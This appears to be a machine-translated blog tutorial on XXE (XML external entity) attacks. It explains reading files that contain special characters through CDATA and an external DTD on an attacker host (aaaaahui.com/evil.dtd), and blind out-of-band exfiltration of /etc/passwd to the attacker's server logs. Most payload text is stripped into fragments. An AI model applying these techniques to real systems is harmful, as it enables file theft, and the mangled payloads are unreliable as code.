Shulou(Shulou.com)05/31 Report--

This article introduces you how to understand XXE loopholes, the content is very detailed, interested friends can refer to, hope to be helpful to you.

There are special symbols when reading files

When reading a file, when the file contains these special symbols such as ", &", it will be parsed by the xml parser and report an error, resulting in a failure to read, such as trying to read the following file

C:\ test.txt

Content:

Payload:

& ampxxe

You can see that unlike reading system.ini, there is an error here. If you want to know why, you need to know CDATA and PCDATA.

PCDATA

PCDATA refers to the parsed character data (Parsed Character Data).

The XML parser usually parses all the text in the XML document.

When a XML element is parsed, the text between its tags is also parsed:

This text will also be parsed

The parser does this because the XML element can contain other elements, as in this case, the element contains the other two elements (first and last):

BillGates

And the parser breaks it down into child elements like this:

BillGatesCDATA

The term CDATA refers to text data (Unparsed Character Data) that should not be parsed by an XML parser.

In the XML element, ". Nested CDATA parts are also not allowed.

The'] >'at the end of the tag CDATA section cannot contain spaces or line breaks.

Our idea is to put the read file in CDATA and then call it, so construct a POC as follows

]% xxe; > & start

But I still can't read it, as shown in the following picture:

Put the correct payload directly, and then explain why.

% dtd;] > & ampall

Http://aaaaahui.com/evil.dtd

You can see that this payload can read the file successfully. Compare the two payload.

The logic of both payload is the same, but the second is the external dtd document that is called, because in xml, the xml parser has a limitation: it cannot be referenced in the internal Entity, and "PEReferences forbidden in internal subset in Entity" means that internal parameter entity references are prohibited.

No echo xxe vulnerability exploitation

Now many xxe vulnerabilities are not echoed. Here are some ways to exploit them when they are no longer echoed.

The idea is that when there is no echo, we will bring out the read file. For example, if we assign the / etc/passwd file to the entity test, then when we access http://www.aaaaahui.com/?%test, the log file on our server will save the contents of the / etc/passwd file. Here's an experiment:

% remote;%send;] > 1234

Xml.dtd

% start

& # x25 is% html entity coding because there cannot be% in xml.dtd entities

The experiment is shown below.

View log files

The file we read here has been brought out, so the principle is to assign the file to the entity, access our vps and then see the file we read in the log file.

On how to understand XXE loopholes to share here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.